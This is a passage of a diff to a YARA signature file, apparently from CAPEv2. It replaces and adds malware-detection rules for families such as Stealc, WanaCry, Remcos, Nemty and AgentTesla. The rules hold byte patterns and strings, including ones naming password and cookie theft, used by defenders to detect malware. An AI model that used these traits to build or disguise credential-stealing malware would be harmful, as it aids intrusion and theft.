"https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "a5b3d518371138740e913d2d6ce4fa22d3da5cea7e034c7d6b4b502e6bf44b06" score = 75 quality = 70 tags = "FILE" - cape_type = "UrsnifV3 Payload" - packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988" - packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579" + cape_type = "LokiBot Payload" strings: - $crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00} - $crypto32_2 = {8B 45 ?? 0F B6 3? FF 45 [2-4] 8B C? 23 C? 40 40 D1 E? 7?} - $crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [10-12] 74 ?? F6 46 03 01 74} - $crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4? 10 [12] 8B [2] 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00} - $cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3} - $cape_string = "cape_options" + $a1 = "DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW" + $a2 = "last_compatible_version" condition: - uint16(0)==0x5A4D and 1 of ($crypto32_*) and $cpuid and not $cape_string + uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Kovter : FILE +rule CAPE_Bitpaymer : FILE { meta: - description = "Kovter Payload" + description = "BitPaymer Payload" author = "kevoreilly" - id = "3dec3c4b-4678-5ed1-a4c3-c3d9abb58b1c" - date = "2019-10-30" - modified = "2019-10-30" + id = "c139b514-a1ba-5d47-8f4d-8e60cddfe2ba" + date = "2019-11-27" + modified = "2019-11-27" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Kovter.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "888fccb8fbfbe6c05ec63bc5658b4743f8e10a96ef51b3868c2ff94afec76f2d" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/BitPaymer.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "6ae0dc9a36da13e483d8d653276b06f59ecc15c95c754c268dcc91b181677c4c" score = 75 quality = 70 tags = "FILE" - cape_type = "Kovter Payload" + cape_type = "BitPaymer Payload" strings: - $a1 = "chkok" - $a2 = "k2Tdgo" - $a3 = "13_13_13" - $a4 = "Win Server 2008 R2" + $decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57} + $antidefender = "TouchMeNot" wide condition: - uint16(0)==0x5A4D and ( all of ($a*)) + uint16(0)==0x5A4D and all of them } -rule CAPE_Rhadamanthys +rule CAPE_Stealc : FILE { meta: - description = "Rhadamanthys Loader" + description = "Stealc Payload" author = "kevoreilly" - id = "4683ef43-7397-5546-ae54-b4c000518182" - date = "2023-09-18" - modified = "2023-09-18" + id = "77567584-7c84-5351-938b-d29d612a042d" + date = "2024-09-10" + modified = "2024-09-10" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Rhadamanthys.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "f71bee3ef1dd7b16a55397645d16c0a20d1fdd3bf662f241c0b11796629b11ff" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Stealc.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d" + logic_hash = "a6165168b7c74761b91d1691465688c748227b830813067edb4e9bdc934271c4" score = 75 quality = 70 - tags = "" - cape_type = "Rhadamanthys Loader" + tags = "FILE" + cape_type = "Stealc Payload" strings: - $rc4 = {88 4C 01 08 41 81 F9 00 01 00 00 7C F3 89 75 08 33 FF 8B 4D 08 3B 4D 10 72 04 83 65 08 00} - $code = {8B 4D FC 3B CF 8B C1 74 0D 83 78 04 02 74 1C 8B 40 1C 3B C7 75 F3 3B CF 8B C1 74 57 83 78 04 17 74 09 8B 40 1C 3B C7 75 F3 EB} - $conf = {46 BB FF 00 00 00 23 F3 0F B6 44 31 08 03 F8 23 FB 0F B6 5C 39 08 88 5C 31 08 88 44 39 08 02 C3 8B 5D 08 0F B6 C0 8A 44 08 08} - $cape_string = "cape_options" + $nugget1 = {68 04 01 00 00 6A 00 FF 15 [4] 50 FF 15} + $nugget2 = {64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 89 45 FC} condition: - 2 of them and not $cape_string + uint16(0)==0x5A4D and all of them } -rule CAPE_Pikabotloader : FILE +rule CAPE_Fareit : FILE { meta: - description = "Pikabot Loader" + description = "Fareit Payload" author = "kevoreilly" - id = "e2c89cdd-0cdb-5367-8aae-2fe685eff972" - date = "2024-03-13" - modified = "2024-03-13" + id = "b3c4eb86-d104-5f31-afa4-5bf5f370f64e" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/PikaBot.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "7e5f1f2911545ee6bd36b54f2627fbdec1b957f4b91df901dd1c6cbd4dff0231" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Fareit.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "ed35391ffc949219f380da3f22bc8397a7d5c742bd68e227c3becdebcab5cf83" score = 75 quality = 70 tags = "FILE" - cape_type = "PikaBot Loader" + cape_type = "Fareit Payload" strings: - $indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1} - $sysenter1 = {89 44 24 08 8D 85 ?? FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8} - $sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8} + $string1 = {0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 31 20 20 09 20 20 67 6F 74 6F 20 09 0D 20 6B 74 6B 0D 0A 20 64 65 6C 20 09 20 20 25 30 20 00} condition: - uint16(0)==0x5A4D and 2 of them + uint16(0)==0x5A4D and any of ($string*) } -rule CAPE_Pikabot : FILE +rule CAPE_Mole : FILE { meta: - description = "Pikabot Payload" + description = "Mole Payload" author = "kevoreilly" - id = "140a3e20-9837-5f66-85dc-af278d75e074" - date = "2024-03-13" - modified = "2024-03-13" + id = "1185170f-4a5b-5347-807b-ef2af98a1a09" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/PikaBot.yar#L15-L28" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "ed07217c373831a9a67d914854154988696e6fcea70dedabf333385f0e7bb8b7" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Mole.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "8be4d190d554a610360c0e04b33da59eb00319395e5b2000d580546ce6503786" score = 75 quality = 70 tags = "FILE" - cape_type = "PikaBot Payload" - packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9" + cape_type = "Mole Payload" strings: - $decode = {29 D1 01 4B ?? 8D 0C 10 89 4B ?? 85 F6 74 02 89 16} - $indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1} - $config = {C7 44 24 [3] 00 00 C7 44 24 [4] 00 89 [1-4] ?? E8 [4] 31 C0 C7 44 24 [3] 00 00 89 44 24 ?? C7 04 24 [4] E8} + $a1 = ".mole0" wide + $a2 = "_HELP_INSTRUCTION.TXT" wide + $a3 = "-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" condition: - uint16(0)==0x5A4D and 2 of them + uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Pik23 : FILE +rule CAPE_Zloader_1 : FILE { meta: - description = "PikaBot Payload February 2023" - author = "kevoreilly" - id = "fc804c63-fc6c-5b26-92b1-aa5d2fbc4917" - date = "2024-03-13" - modified = "2024-03-13" + description = "Zloader Payload" + author = "kevoreilly, enzok" + id = "ce0662b4-c615-5b87-b5c1-173f90a97db2" + date = "2024-05-06" + modified = "2024-05-06" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/PikaBot.yar#L30-L44" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1" - logic_hash = "71a71df2f2a075294941c54eed06cafaaa4d3294e45b3a0098c1cffddd0438bc" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Zloader.yar#L1-L18" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa" + logic_hash = "a94efd87c69146cf5771341974e5abe789445d67dde3e045e1b87d3131539ff9" score = 75 quality = 70 tags = "FILE" - cape_type = "PikaBot Payload" + cape_type = "Zloader Payload" strings: - $rdtsc = {89 55 FC 89 45 F8 0F 31 89 55 F4 89 45 FC 33 C0 B8 05 00 00 00 C1 E8 02 2B C3 3B C1 0F 31 89 55 F0 89 45 F8 8B 44 8D} - $int2d = {B8 00 00 00 00 CD 2D 90 C3 CC CC CC CC CC CC CC} - $subsys = {64 A1 30 00 00 00 8B 40 18 C3} - $rijndael = {EB 0F 0F B6 04 3? FE C? 8A 80 [4] 88 04 3? 0F B6 [3] 7C EA 5? 5? C9 C3} + $rc4_init = {31 [1-3] 66 C7 8? 00 01 00 00 00 00 90 90 [0-5] 8? [5-90] 00 01 00 00 [0-15] (74|75)} + $decrypt_conf = {83 C4 04 84 C0 74 5? E8 [4] E8 [4] E8 [4] E8 [4] ?8 [4] ?8 [4] ?8} + $decrypt_conf_1 = {48 8d [5] [0-6] e8 [4] 48 [3-4] 48 [3-4] 48 [6] E8} + $decrypt_conf_2 = {48 8d [5] 4? [5] e8 [4] 48 [3-4] 48 8d [5] E8 [4] 48} + $decrypt_key_1 = {66 89 C2 4? 8D 0D [3] 00 4? B? FC 03 00 00 E8 [4] 4? 83 C4 [1-2] C3} + $decrypt_key_2 = {48 8d 0d [3] 00 66 89 ?? 4? 89 F0 4? [2-5] E8 [4-5] 4? 83 C4} + $decrypt_key_3 = {48 8d 0d [3] 00 e8 [4] 66 89 [3] b? [4] e8 [4] 66 8b} condition: - uint16(0)==0x5A4D and 3 of them + uint16(0)==0x5A4D and 1 of ($decrypt_conf*) and (1 of ($decrypt_key*) or $rc4_init) } -rule CAPE_Mole : FILE +rule CAPE_Wanacry : FILE { meta: - description = "Mole Payload" + description = "WanaCry Payload" author = "kevoreilly" - id = "1185170f-4a5b-5347-807b-ef2af98a1a09" - date = "2019-10-30" - modified = "2019-10-30" + id = "a6525e0f-fccd-5542-9be8-e42d708fe502" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Mole.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "8be4d190d554a610360c0e04b33da59eb00319395e5b2000d580546ce6503786" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/WanaCry.yar#L1-L16" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "16d5e39f043d27bbf22f8f21e13971b7e0709b07e44746dd157d11ee4cc51944" score = 75 quality = 70 tags = "FILE" - cape_type = "Mole Payload" + cape_type = "WanaCry Payload" strings: - $a1 = ".mole0" wide - $a2 = "_HELP_INSTRUCTION.TXT" wide - $a3 = "-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" + $exename = "@WanaDecryptor@.exe" + $res = "%08X.res" + $pky = "%08X.pky" + $eky = "%08X.eky" + $taskstart = {8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53} condition: - uint16(0)==0x5A4D and ( all of ($a*)) + uint16(0)==0x5A4D and all of them } -rule CAPE_Azer : FILE +rule CAPE_Nemty : FILE { meta: - description = "Azer Payload" + description = "Nemty Ransomware Payload" author = "kevoreilly" - id = "4bda70c2-3cd9-543f-92f4-886b7dd899a1" - date = "2019-10-30" - modified = "2019-10-30" + id = "3aa8e1d7-f9cb-5b04-923d-7bed15ab8c3f" + date = "2020-04-03" + modified = "2020-04-03" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Azer.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "48bd4a4e071f10d1911c4173a0cd39c69fed7a3b29eb92beffe709899f4cefa5" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Nemty.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "a05974b561c67b4f1e0812639b74831edcf65686a06c0d380f0b45739e342419" score = 75 quality = 70 tags = "FILE" - cape_type = "Azer Payload" + cape_type = "Nemty Payload" strings: - $a1 = "webmafia@asia.com" wide - $a2 = "INTERESTING_INFORMACION_FOR_DECRYPT.TXT" wide - $a3 = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ" + $tordir = "TorDir" + $decrypt = "DECRYPT.txt" + $nemty = "NEMTY" condition: - uint16(0)==0x5A4D and ( all of ($a*)) + uint16(0)==0x5A4D and all of them } -rule CAPE_Jaff : FILE +rule CAPE_Rokrat : FILE { meta: - description = "Jaff Payload" + description = "RokRat Payload" author = "kevoreilly" - id = "6681c1fe-6c88-5a49-bdfa-54ce08ea6707" - date = "2019-10-30" - modified = "2019-10-30" + id = "12e05b90-9771-5901-ae82-9fd2ea6263e7" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Jaff.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "6806a5eeee04b7436ff694addc334bfc0f1ee611116904d57be9506acfd47418" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/RokRat.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "2aaa7de7ccd59e0da690f4bc0c7deaacf61314d61f8d2aa3ce6f6892f50612ec" score = 75 quality = 70 tags = "FILE" - cape_type = "Jaff Payload" + cape_type = "RokRat Payload" strings: - $a1 = "CryptGenKey" - $a2 = "353260540318613681395633061841341670181307185694827316660016508" - $b1 = "jaff" - $b2 = "2~1c0q4t7" + $code1 = {8B 57 04 8D 7F 04 33 57 FC 81 E2 FF FF FF 7F 33 57 FC 8B C2 24 01 0F B6 C0 F7 D8 1B C0 D1 EA 25 DF B0 08 99 33 87 30 06 00 00 33 C2 89 87 3C F6 FF FF 83 E9 01 75 C9} + $string1 = "/pho_%s_%d.jpg" wide condition: - uint16(0)==0x5A4D and ( any of ($a*)) and (1 of ($b*)) + uint16(0)==0x5A4D and ( any of ($code*)) and ( any of ($string*)) +} +rule CAPE_Buerloader_1 : FILE +{ + meta: + description = "No description has been set in the source file - CAPE" + author = "kevoreilly & Rony (@r0ny_123)" + id = "95a9b4d7-db1e-50cd-bc08-01e4e4fd6dc4" + date = "2022-05-31" + modified = "2022-05-31" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/BuerLoader.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "05c1f008f0a2bb8232867977fb23a5ae8312f10f0637c6265561052596319c29" + score = 75 + quality = 70 + tags = "FILE" + cape_type = "BuerLoader Payload" + + strings: + $trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31} + $decode = {8A 0E 84 C9 74 0E 8B D0 2A 0F 46 88 0A 42 8A 0E 84 C9 75 F4 5F 5E 5D C2 04 00} + $op = {33 C0 85 D2 7E 1? 3B C7 7D [0-15] 40 3B C2 7C ?? EB 02} + + condition: + uint16(0)==0x5A4D and 2 of them } rule CAPE_Ursnif : FILE { @@ -114401,8 +116209,8 @@ rule CAPE_Ursnif : FILE date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Ursnif.yar#L1-L19" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Ursnif.yar#L1-L19" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" logic_hash = "46e79fde81ff5352314618021e394b2e0322df07170c7279363290b7134935fd" score = 75 quality = 70 @@ -114422,555 +116230,560 @@ rule CAPE_Ursnif : FILE condition: uint16(0)==0x5A4D and ($decrypt_config64 and any of ($crypto64*)) or ($decrypt_config32 and any of ($crypto32*)) } -rule CAPE_Cargobayloader : FILE +rule CAPE_Remcos : FILE { meta: - description = "CargoBay Loader" + description = "Remcos Payload" author = "kevoreilly" - id = "5b347863-0bea-55d2-aaf3-b3d6e604be89" - date = "2023-02-20" - modified = "2023-02-20" + id = "f77295ca-02d5-5b2c-80b8-b6566610bff8" + date = "2022-05-10" + modified = "2022-05-10" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/CargoBayLoader.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "75e975031371741498c5ba310882258c23b39310bd258239277708382bdbee9c" - logic_hash = "1d5c4ca79f97e1fac358189a8c6530be12506974fc2fb42f63b0b621536a45c9" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Remcos.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "38142e784ad437d9592353b924f74777bb62e5ed176c811230a2021a437d4710" score = 75 - quality = 70 + quality = 68 tags = "FILE" - cape_type = "CargoBay Loader" + cape_type = "Remcos Payload" strings: - $jmp1 = {40 42 0F 00 0F 82 [2] 00 00 48 8D 15 [4] BF 04 00 00 00 41 B8 04 00 00 00 4C 8D [3] 4C 89 F1 E8} - $jmp2 = {84 DB 0F 85 [2] 00 00 48 8D 15 [4] 41 BE 03 00 00 00 41 B8 03 00 00 00 4C 8D 7C [2] 4C 89 F9 E8} + $name = "Remcos" nocase + $time = "%02i:%02i:%02i:%03i" + $crypto1 = {81 E1 FF 00 00 80 79 ?? 4? 81 C9 00 FF FF FF 4? 8A ?4 8?} + $crypto2 = {0F B6 [1-7] 8B 45 08 [0-2] 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 ?? ?? FF FF 30 06 47 3B 7D 0C 72} condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and ($name) and ($time) and any of ($crypto*) } -rule CAPE_Zeuspanda : FILE +rule CAPE_Jaff : FILE { meta: - description = "ZeusPanda Payload" + description = "Jaff Payload" author = "kevoreilly" - id = "7891c021-6687-5457-b9e1-0beb0472647c" - date = "2022-06-09" - modified = "2022-06-09" + id = "6681c1fe-6c88-5a49-bdfa-54ce08ea6707" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/ZeusPanda.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "43d8a56cae9fd23c053f6956851734d3270b46a906236854502c136e3bb1e761" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Jaff.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "6806a5eeee04b7436ff694addc334bfc0f1ee611116904d57be9506acfd47418" score = 75 quality = 70 tags = "FILE" - cape_type = "ZeusPanda Payload" + cape_type = "Jaff Payload" strings: - $code1 = {8B 01 57 55 55 55 55 55 55 53 51 FF 50 0C 85 C0 78 E? 55 55 6A 03 6A 03 55 55 6A 0A FF 37} - $code2 = {8D 85 B0 FD FF FF 50 68 ?? ?? ?? ?? 8D 85 90 FA FF FF 68 0E 01 00 00 50 E8 ?? ?? ?? ?? 83 C4 10 83 F8 FF 7E ?? 68 04 01 00 00 8D 85 B0 FD FF FF} + $a1 = "CryptGenKey" + $a2 = "353260540318613681395633061841341670181307185694827316660016508" + $b1 = "jaff" + $b2 = "2~1c0q4t7" condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and ( any of ($a*)) and (1 of ($b*)) } -rule CAPE_Tclient : FILE +rule CAPE_Agent_Tesla { meta: - description = "TClient Payload" + description = "Detecting HTML strings used by Agent Tesla malware" + author = "Stormshield" + id = "5383994b-357d-539b-89b1-53be238f759d" + date = "2024-03-22" + modified = "2024-03-22" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/AgentTesla.yar#L1-L17" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "3945754129dcc58e0abfd7485f5ff0c0afdd1078ae2cf164ca8f59a6f79db1be" + score = 75 + quality = 70 + tags = "" + version = "1.0" + + strings: + $html_username = "
UserName      : " wide ascii + $html_pc_name = "
PC Name       : " wide ascii + $html_os_name = "
OS Full Name  : " wide ascii + $html_os_platform = "
OS Platform   : " wide ascii + $html_clipboard = "
[clipboard]" wide ascii + + condition: + 3 of them +} +rule CAPE_Agenttesla : FILE +{ + meta: + description = "AgentTesla Payload" author = "kevoreilly" - id = "38c9ea20-9d91-5fb0-8b3b-170538ad7ea8" - date = "2022-06-09" - modified = "2022-06-09" + id = "f7b930f1-cecb-5d80-809b-9503f282247a" + date = "2024-03-22" + modified = "2024-03-22" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/TClient.yar#L1-L11" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "6edcd01e4722b367723ed77d9596877d16ee35dc4c160885d125f83e45cee24d" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/AgentTesla.yar#L19-L41" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "1bf9b26c4cf87e674ddffabe40aba5a45499c6a04d4ff3e43c3cda4cbcb4d188" score = 75 quality = 70 tags = "FILE" - cape_type = "TClient Payload" + cape_type = "AgentTesla Payload" strings: - $code1 = {41 0F B6 00 4D 8D 40 01 34 01 8B D7 83 E2 07 0F BE C8 FF C7 41 0F BE 04 91 0F AF C1 41 88 40 FF 81 FF 80 03 00 00 7C D8} + $string1 = "smtp" wide + $string2 = "appdata" wide + $string3 = "76487-337-8429955-22614" wide + $string4 = "yyyy-MM-dd HH:mm:ss" wide + $string6 = "webpanel" wide + $string7 = "
UserName      :" wide + $string8 = "
IP Address  :" wide + $agt1 = "IELibrary.dll" ascii + $agt2 = "C:\\Users\\Admin\\Desktop\\IELibrary\\IELibrary\\obj\\Debug\\IELibrary.pdb" ascii + $agt3 = "GetSavedPasswords" ascii + $agt4 = "GetSavedCookies" ascii condition: - uint16(0)==0x5A4D and any of ($code*) + uint16(0)==0x5A4D and ( all of ($string*) or 3 of ($agt*)) } -rule CAPE_Petya : FILE +rule CAPE_Agentteslav2 : FILE { meta: - description = "Petya Payload" - author = "kevoreilly" - id = "e581747c-c40f-5689-84b4-d55134b532f7" - date = "2019-10-30" - modified = "2019-10-30" + description = "AgenetTesla Type 2 Keylogger payload" + author = "ditekshen" + id = "e60ecee4-0a97-56a1-b21e-47190f8cd1f8" + date = "2024-03-22" + modified = "2024-03-22" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Petya.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "f819261bb34f3b2eb7dc2f843b56be25105570fe902a77940a632a54fbe0d014" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/AgentTesla.yar#L43-L67" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "b45296b3b94fa1ff32de48c94329a17402461fb6696e9390565c4dba9738ed78" score = 75 quality = 70 tags = "FILE" - cape_type = "Petya Payload" + cape_type = "AgentTesla Payload" strings: - $a1 = "CHKDSK is repairing sector" - $a2 = "wowsmith123456@posteo.net" - $a3 = 